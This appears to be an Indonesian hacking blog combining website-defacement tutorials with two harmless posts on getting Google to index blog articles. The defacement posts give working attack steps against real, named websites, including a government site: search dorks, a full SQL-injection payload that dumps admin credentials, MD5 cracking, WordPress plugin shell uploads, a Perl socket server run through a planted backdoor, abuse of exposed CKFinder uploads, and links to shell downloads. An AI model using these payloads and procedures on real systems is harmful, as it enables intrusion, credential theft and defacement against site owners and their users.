Crash Seo

Sunday, January 13, 2019

Deface dengan cara download backup zip



Hallo teman teman :v
Kalian suka deface kan? Gimana enak gk? iya sih susah tapi hasilnya memuaskan

Ok kali ini gw mau kasih tutorial Deface Dengan Cara Download Backup Zip
Ok knpa harus download file .zip ??

Jadi kelemahan si admin ialah menaro backup an webnya di public_html jadi si attacker tinggal mendownload file backup zip nya
Lalu apa isi dari file backup zip nya? Ok isinya adalah semua backup an website si admin , dari mulai index, user , password dllnya

Gimana cara nya? ok gw jelasin

Bahan bahan :

1. Dork: gw disini gk mencantumkan dorknya, pakai otak kalian ya

2. wajah yang gans :v



Caranya

1. Klo misalkan udh ketemu file zip nya mau apa itu namanya, misalkan gini
www.site.com/backup.zip trus lu download file zip nya

2. Klo udh download lu buka pke winrar, klo jenis file zip gw kaya gini ,mungkin beda website beda CMS nya jadi gk sama kya gw


3. nah itu isi dari file zipnya ,, skrg lu cari database.sql nya
dimana yg di dlmnya terdapat user & pw si website trus lu buka file .sqlnya maka akan muncul barisan USER & PW

\

4. Nah itu dia user & pw nya , ingat pw nya masih berbentuk MD5. jadi kita hash dlu di hashkiller.co.uk/md5-decrypter.aspx .. Nah ini gw udh berhasil nemuin passwordya sesudah gw hash



5. nah silahkan login ke website yg lu download file zip tadi
Lalu gimana kita mengetahui halaman admin dari website tersebut?
Ya kan di folder zip tadi udh lengkap semuanya, dari mulai halaman admin , user , password , dllnya



6. nah klo berhasil login kya gini , jreng jreng jreng


7. ea ea dah berhasil masuk ke dashboard admin, tinggal upload shell :v wkwkwkw
usahakan backup index nya


Ok dah sekian tutorialnya untuk hari ini :v
Se you next time & selamat mencoba :*

Tuesday, January 1, 2019

Tutorial Deface dengan cara Sql Lokomedia

Oh iya ane mau share cara deface lg nih , tapi dengan cara yg berbeda :v , kali ini ane share cara deface dengan cara SQL LOKOMEDIA :v
Oh iya sebelom ane ksih tau tutornya , ane mau nanya neh :v , Klean smua malem jumat ini ngapain aja >:( , jangan jangan ........... ahh sudahlah lupakan :v ... Yuk disimak caranya :V


Bahan Bahan :

#Dork : inurl:/statis-1-profil.html
             inurl:/statis-2-profil.html
             inurl:/statis-3-profil.html [ Kembangin lagi dorknya biar dpet web yg vuln, oh iya ane ksih tau nih klo mau kembangin dork ini tinggal ubah aja ANGKA nya ]

#Bagi yg blom pnya shell format .phtml bisa di download disini ~> https://uploadfiles.io/72upn
  password shellnya : akugans

#Exploit :

'/*!50000union*/+/*!50000select*/+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+

#Admin finder online/admin finder tools jg boleh :v

#oh ea , saran ane sih sambil dengerin musik Marshmello :v


Caranya :

1. seperti biasanya kita buka google trus masukin dork yg diatas , trus pilih salah satu websitenya tapi cari yg ada halaman statisnya :v, lihat gambar :v



2. nah ane udh dapet targetnya nih, kan di url target tertulis
http://sewakursimejamurah.com/statis-1-profil.html
ada statis-1-profil.html kan? nih liat gambar



3. nah pas sesudah angka sisipkan exploitnya maka akan jadi seperti ini
 http://sewakursimejamurah.com/statis-1'/*!50000union*/+/*!50000select*/+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html
[ sesudah di sisipkan exploitnya skrg tekan enter, dan liat di tab atas tertulis [ ,admin,06c43bd.....] nah klo di atas tab muncul begitu brrti username sma password udh ketebak :v, untuk melihat username dan passwordnya sekarang klo untuk di Pc/komputer/Laptop pencet Ctrl+U mungkin klo di hp bisa tambahin doang [ view-source: ] di awal url linknya :v, liat gambar :v




4. kan udh ente ctrl+u tuh , nah sekarang liat disitu tertulis admin,09....... nah itu dia username sma passwordnya, OH IYA ITU BUKAN PASSWORD ASLINYA , TAPI KITA HARUS HASH PASSWORDNYA DLU BIAR BISA DAPAT PASSWORD ASLINYA



5. ok kita kan udh tau nih ya kan username sama passwordnya yg msih dalam bentuk Md5 sekarang kita Copy passwordnya itu yg di samping kanan tulisan admin, nah copy angkanya saatnya kita hash online passwordnya di https://hashkiller.co.uk/md5-decrypter.aspx  ,,, nah dan jreng jreng ane udh berhasil nih gan dapet password aslinya :v,Untuk liat password aslinya nnti akan muncul di sebelah kanan, nih liat gambar



6. nah kan udh dapet password aslinya tuh, sekarang kita cari dimana admin loginnya, bisa pke adminfinder online, bisa juga pke admin finder tools :v, bisa juga pke cara manual nih ane ajarin , caranya

*misalkan web ini : http://sewakursimejamurah.com
*Kita tambahkan /robots.txt di akhir urlnya maka akan jadi gini http://sewakursimejamurah.com/robots.txt
nah pas kita tambahkan /robots.txt maka akan muncul tulisan
User-agent: *
Disallow: /adminw36
[ Nah kita liat deh tuh yg tulisan disallow nya, karna itu disallownya /adminw36 berarti halaman admin login ada di http://sewakursimejamurah.com/adminw36 ] , paham kan? liat gambar :v



7. sekarang kita coba login dengan username sama password yg udh kita hash tadi , halaman admin login ada disini http://sewakursimejamurah.com/adminw36 klo udh berhasil msk maka tampilan nya akan seperti ini



8. Daaaaan Boom!!! kita udh berhasil masuk sebagai admin di web sewakursimejamurah.com wkwkwk :v, oh iya cara tanem shellnya gomna? iya kalem ane jelasin :v
OK , dimana tempat buat tanem shellnya? lihat tulisan [ Media Trus Pilih Download ] kan? nah disitu kita tanem shellnya , lihat gambar :v



9. Nah itu udh ada file nya :v, itu juga shell ane :v , udh ane tanem :v jadi ane gausah tanem lg ea :v , skrg kita klik tulisan [ Tambah Download ] , Nah trus pilih deh shell lu , tampilannya kya gini :v



10. INGET BRO BACA BAIK BAIK : upload shellnya harus format .phtml
      jadi yg blom punya udh ane sediain tuh diatas link buat download shellnya :v


11. ok klo shell udh berhasil ke upload sekarang kita cari akses shellnya/ bisa dibilang dimana shell lu berada caranya? ok gini caranya kita cukup tambahkan /files/namashelllu  . jadi kaya gini http://sewakursimejamurah.com/files/shell.phtml [ Nah yg Shell.phtml itu lu ubah aja sesuaikan dengan nama shell yg udh lu upload tadi gan :v ... nah dan jreng jreng ane udh ketemu nih akses shellnya lihat gambar :v



hehe terserah deh mau diapain :v , Tebas index jg gapapa :v
TAPI INGAT klo mau tebas index , diusahakan di backup indexnya kasihan adminnya bikin script indexnya lag :'(
Kalo mau jadi bajingan jadi sekalian jangan tanggung tanggung , tapi kalo mau jadi bajingan tapi ragu-ragu mending jangan

h3h3 udh itu aja ya :v, ok cukup sekian tutor dari ane, ane akan share share cara deface yg lainnya , see you next time guys :v

Oh iya klo ada link atau gambar yg ga muncul atau ada yg ga ngerti bisa langsung kontak ane

Tutorial Deface dengan cara Wp Add Admin


Setelah sekian lama share berita berita trus, Kini saatnya Share cara deface Wp Add Admin

Kita memanfaatkan pada form loginnya, ok langsung aja ya bahan bahannya dan caranya

Bahan Bahan :

1. Dork : inurl:/wp-login.php?action=register site:in [ Site bisa diganti sesuai keinginan ]

2. Email yang aktif , karna email kita digunain untuk mengaktifkan user &  password yg kita daftarkan

3. File zip yang digunakan untuk upload shell saat nanti udh selesai register, bagi yg blm punya file zipnya kalian bisa download disini ~> Klik Disini!! , Kalo link pertama rusak/gabisa kalian bisa download disini ~> Link Download ke 2
Isi dari file zip tersebut
- shellmini
- shellbesar
- shellxai dll nya

4. wajah yg ganteng >:( , kalo gk gans ya gabisa pekok >:( awokakoaowk canda :v


Caranya guys :*

1. Hal 1 seperti biasa gan klean dorking dlu menggunakan dork diatas ke mesin pencarian Google awokawok :v

2. Kalo udh dorking nah , pilih salah satu website yg tampilannya sperti ini atau yg tampilannya di bawahnya ada form register , ini contohnya


Liat yg dilingkari kan? nah itu dia form registrasinya

3. Slnjutnya kita klik registrasi , dan masukkan email yg aktif beserta username terserah kalian klo usernamenya , contoh kya gini


4. Nah klo udh registrasi , kalian cek email kalian, nnti di email klean ada link aktivasi buat membuat passwordnya

5. Kalo klean udh selesai registrasi , nah login dengan username dan password yg klean buat tadi... Jika berhasil login. kita masuk sebagai admin. contoh lihat gambar


6. Nah kita udh msuk sebagai admin nih, Lalu gimana caranya upload shell? Gimana? Iya kalem w kasih tau caranya
Ok di dashboard admin, kalian cari tulisan [ Plugin ] *Tanpa tnda kurung
Lihat gambar



7. Nah selanjutnya kalian upload file yg format zip tadi , uploadnya di plugin ea :v
Kalo upload nya berhasil maka akan kya gini tampilannya


Pokoknya klo upload brhsil , ada tulisan [ akrivate plugins ]

8. Nah kan file udh ketanem, selanjutnya kita mencari akses shellnya, gimana nyarinya? iya gimana ea?
Ok gini caranya kalian tinggal tambahkan contoh
www.site.com/wp-content/plugins/namafilelu/jenisshellnya
Contoh kya gini liat gambar


9. Nah itu dia contoh nyari akses shellnya... Btw shell w udh ke upload ea :v, wkwkwk nah klo akses shell udh ketemu trus mau diapain tuh? wkwkwk silahkan tebas index... tapi saran sih kalo tebas index backup indexnya gan
Hargain webmaster dari website tersebut gan :v pakai Ethica Hacking lo :v

dah ya tutorialnya cukup smpe disini aja ya...
Ok sekian. see you next time guys :*

Cara Biar Artikel Blog Cepat Terindex Google

Hei bro, di kesempatan kali ini admin crash seo akan mengembangkan trik bagaimana cara biar artikel atau postingan blog Anda dapat cepat terindex Google. Jika Anda seorang blogger dan Anda gres saja mempublish artikel, apakah artikel Anda dapat eksklusif ditemukan lewat mesin pencari Google? Mungkin kalau blog Anda sudah populer dan punya banyak followers dapat eksklusif ditemukan. Tetapi untuk blog-blog gres mungkin membutuhkan waktu biar artikelnya dapat ditemukan oleh Google. Bisa dalam hitungan hari, minggu, bahkan bulan.
 akan mengembangkan trik bagaimana cara biar artikel atau postingan blog Anda dapat cepat terinde Cara Agar Artikel Blog Cepat Terindex Google
Untuk mengatasi hal tersebut, saya sarankan untuk blog-blog gres melaksanakan cara ini biar pengunjung dapat eksklusif menemukan artikel Anda di Google. Bagaimana caranya? silahkan ikuti langkah-langkah dibawah.

Langkah 1 : Login ke Webmaster menggunakan akun Google, kemudian pilih blog Anda.

Langkah 2 : Jika sitemap blog Anda belum terdaftar. Pilih sajian Sitemaps, tambahkan sitemap.xml, kemudian klik Submit. Lihat gambar dibawah. Jika sudah terdaftar, lewati langkah ini & lanjut ke Langkah 3.



Langkah 3 : Pilih sajian URL Inspection, isi kolomnya dengan url artikel Anda, kemudian tekan Enter. Jika muncul menyerupai gambar dibawah, berarti artikel Anda belum terindex google.

 akan mengembangkan trik bagaimana cara biar artikel atau postingan blog Anda dapat cepat terinde Cara Agar Artikel Blog Cepat Terindex Google

Langkah 4 : Klik Request Indexing dan tunggu sampai prosesnya selesai. Jika sudah simpulan lakukan langkah no 3 kembali dan lihat hasilnya. Jika akhirnya menyerupai gambar dibawah berarti artikel Anda sudah terindex dan dapat dicari di Google.

 akan mengembangkan trik bagaimana cara biar artikel atau postingan blog Anda dapat cepat terinde Cara Agar Artikel Blog Cepat Terindex Google



Selesai.. dan begitulah caranya biar artikel atau postingan Anda dapat terindex di google dengan cepat. Jika ada yang belum dimengerti silahkan tulis di kolom komentar. Sekian dan semoga bermanfaat.

Cara Agar Artikel Blog Sangat Cepat Terindex Oleh Google TERBARU

Oke sebelumnya kita sudah membahas Bagaimana Cara Agar Artikel Terindex Oleh Google Namun sepertinya kalian tidak puas akan hal itu saja, kali ini mimin akan share Tentang ini.

Sebelum Masuk kepembahasan akan lebih baik kalian tau mengenai tentang artikel atau blog baru buat terindex Google.

Setiap kali kita membuat blog belum tentu blog baru kita akan tampil di mesin pencari google,salah satu cara mengetahui blog kita sudah terindex di google atau belum adalah dengan menulis nama domain kita di mesin pencari namun untuk lebih detail anda harus menulis site:namadomain.com sebagai contoh site:crash-seo.blogspot.com atau sebuah blog baru di buat belum tentu langsung akan di index di google,bergitu juga dengan artikel baru kita buat,terkadang butuh waktu 3-7  hari artikel baru kita baru muncul di mesin pencari / google.tetapi ada sebagai artikel dan blog baru yang tidak di index di google sama sekali dan membutuhkan waktu 3 sampai 1 bulan biar terindex, sangat menyedihkan.

Maka dari itu mimin akan share tutorial supaya website kalian atau postingan kalian langsung masuk ke mesin pencarian google nih, caranya cukup mudah ko cukup simak ini baik baik Kalian akan langsung mengerti !!
   
Cara Agar Artikel Langsung Terindex Oleh Google Terbaru 

 Assalamuallaikum Wr,Wb , Sebelumnya saya ucapkan terima kasih kepada kalian yang sudah mengunjungi website ini, pada pertemuan kali ini mimin akan share nih cara terbaru dari Cara Agar Artikel Langsung Terindex Oleh Google Terbaru.

Kita langsung saja ke tahap tutorialnya.
Langkah Langkahnya Adalah:

     1.  Kunjungi Google WebMaster Tools / Google Search Console
     2.  Daftar Pake Akun google kalian dan Masukan Situs kalian disitu
     3.  Jika Sudah masuk ke Dasboard WebMaster Tools Tekan Inspeksi URL


     4. Masukan Link Postingan kalian diatas itu Lalu kalian tekan Enter.


     5. Setelah itu kalian tekan MINTA PENGINDEKSAN
     6. Tunggu hingga satu atau dua menit biasanya akan selesai.
     7. Setelah selesai tekan lagi UJI URL AKTIF dan tunggu beberapa saat
     8. Selesai Website kalian sudah langsung terindex diGoogle

Sangat mudah bukan Cara Agar Artikel Langsung Terindex Oleh Google Terbaru 

Setelah melakukan tutorial itu tinggal kalian cek Saja digoogle seperti ini contohnya
site:http://crash-seo.blogspot.com
ganti domainnya sama punya kalian yak :* Oke sampai situ saja yang bisa mimin sampaikan kepada kalian semoga bermanfaat untuk kalian semua.
  Kesimpulan yang bisa kita ambil adalah Google itu robot dan robot pasti ada pengendalinya jika bukan kita yang mengendalikannya lalu siapa yang akan mengendalikan robot itu? yang jelas kita semua!

Tutorial Deface Dengan Cara Socket Server With Perl

Pernah denger kasus web memecomic.id di hack? pernah denger? ya si peretas hanya menitipkan file di web memcomic , klo udh tau beritanya baguss guud :v
Nah sekarang ane mau kasih tau nih cara hack seperti kasus web memecomic.id
Cara ini ane dapet + cara ini bersumber dari forum IndoXploit

Nah sekarang ane kasih tau caranya nih , DEFACE DENGAN SOCKET SERVER WITH PERL

Bahan Bahan :

#Yg hrus kalian punya itu File perl , ane udh sediain nih file perl nya silahkan di download disini
  Download
  Nanti file perl nya lu edit aja sendiri nomor portnya sama tambahin nick lu ok oc :v

#Syarat kedua lu harus punya website yg udh lu tanem shell backdoor , nanti akan di upload trus dijalankan file perl lu :v

#jangan lupa makan sama minum :*

Caranya neh >:(

1. lu buka web yg udh lu tanem shell, tapi liat dlu , perl nya ON apa gk , cara lihatnya bisa dari sini ada shell bagian atas



2. lu buka website yg udh lu tanem shell , Trus ke form upload, nah upload file perl yg tdi lu download , nah ini ane ss file perl yg udh ane upload



3. nah klo udh di upload sekarang jalankan file perlnya di menu [ Command ] udh ada di dlm shell , lu ketik ini di menu command [ perl oh.pl ] TANPA TANDA KURUNG ,, Trus enter lalu tunggu sebentar biasanya agak lama



4. klo udh di ketik itu , sekarang kita cek websitenya , contoh : site.com:1337
    - 1337 = Nmor port yg di file oh.pl



5. Nah itu hasilnya kaya gitu , tinggal tambahin nomor port yg di file oh.pl
Gomana udh ngerti? Klo ada yg kurang ngerti bisa contact ane di fb

Ok sekian .... See You Next Time Guys :*

Tutorial Deface Dengan Cara CKFinder

Oh ea sbenernya oe masih ngantuk neh :v , Semalem oe bobo jam 2 pagi :( , Tapi oe pagi pagi gini mau tebar ilmunya neh :v yaituuuuuuu :v
DEFACE DENGAN CARA CKFINDER
Jreng boom :v , Mungkin sebagian udh tau deface dengan cara ini , tapi apa salahnya kita untuk mencoba lagi trus mencoba trus mencoba dan mencoba :v dan mengasih tau bagi yg blm tau :v
Kebetulan deface dengan cara ini msih banyak web yg vulnerability mungkin ada disekita 20++ web yg vuln cara ini , GOOGLE pun juga bisa di deface pke cara ini :v , awokaokaowkk dasar heker jaman now :v ... Langsung aja ya bahan dan cara caranya :v

Bahan Bahan :

# Dork : inurl:/CKfinder/CKfinder.html site:com [ Site bebas mau apa aja bisa .com .org .in go.id .gov pokoknya bebas ]

#Kali ini kita hanya membutuhkan sebuah teks, tulisan [ Pke script deface juga bisa sih tapi jarang , kebanyakan hanya teks doang ] ,, krna deface ini hnya pke teks sama gambar doang mungkin bagi yg blm punya teksnya bisa di download disini teks nya >> https://ufile.io/v0rpj

#Koneksi Internet yang kenceng ea :*


Langsung aja caranya disni :

1. Seperti biasanya kita buka mesin pencarian senior kita yaitu https://google.com Ok kalo udh search di google sekarang pilih salah satu webnya, lihat gambar




2. nah sekarang buka web yg klean pilih , penampakannya akan seperti ini lihat gambar



3. selanjutnya kita upload text yg kalian download diatas tdi, udh ane kasih kan? nah iya sekarang upload textnya , klo udh ke upload akan muncul text kalian yg tadi , seperti ini lihat gambar :v text yg ane upload nmanya anonymous tuh lihat gmbar :v


4. karena itu ane udh coba upload dalam format teks , sekarang ane mau coba upload dalam bentuk gambar, klo kalian mau upload sebuah gambar bisa klik di folder [ Images ] nah trus nanti klik upload, boom ane udh berhasil upload gambarnya yg namanya palestina.jpg itu gambar ane :v ,lihat gambar :v



5. Nah file teks sma file gambar udh ke upload sekarang kita klik kanan pada file/gambar yg udh kalian upload tadi , lalu pilih view dan jreng jreng jreng ini dia hasil gambar yg udh ane upload tadi :v



6. OH IYA bagi kalian yg upload gambar trus susah cara cari gambarnya atau cara buka gambarnya seperti diatas , nih ane kasih patch nya aja tinggal tambahin nama gambar lu di akhir url nih patchnya

http://birodikmental.jakarta.go.id/extra/ckfinder/core/connector/php/media/ckfinder/images/palestina.jpg   [ YANG PALESTINA.jpg Ganti dengan nama gambar yg udh lu upload tadi ] Ngerti kan? Klo ga ngerti chat oe aja :v


7.Oh iya udh pada ngerti kan? pasti dong ya lach kan udh pro >:(
 yaudh oh iya tuh ane kasih live target juga buat bahan percobaan bagi yg pemula hehehe :v
ok ane pamit ea fans :* :*

oh ea klo ada yg ga ngerti langsung chat ane aja di ? Dimana ? Dimana aja :v

ok sekian dolo ea tutor defacenya nanti ane balik lagi , ngasih tutor tutor yg lebih zeeb :v ok sekian